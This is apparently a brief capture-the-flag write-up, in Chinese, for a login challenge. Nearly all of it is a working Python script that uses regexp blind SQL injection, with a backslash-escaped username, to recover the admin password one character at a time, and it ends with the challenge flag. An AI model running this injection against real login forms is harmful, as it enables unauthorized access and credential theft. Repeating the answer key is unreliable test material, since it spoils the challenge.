这题采用了regexp盲注
可以使用python
import requests
import string
def str2hex(string):
result=''
for i in string:
result+=hex(ord(i))
result=result.replace('0x','')
return'0x'+result
strs=string.ascii_letters+string.digits
url="http://44d45158-6d22-4b4c-b3f0-4209335a87f7.challenge.qsnctf.com:8081/login.php"
headers= {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload='or password regexp binary {}#'
if __name__=="__main__":
name=''
for i in range(1,40):
for j in strs:
passwd=str2hex('^'+name+j)
payloads=payload.format(passwd)
postdata={
'username':'admin\\',
'password':payloads
}
r=requests.post(url,data=postdata,headers=headers)
if "Maybe you are right" in r.text:
name+=j
print(j,end='')
break
猜测出密码后登录得到flag
flag{so_3asy_sql_1nj3cti0n}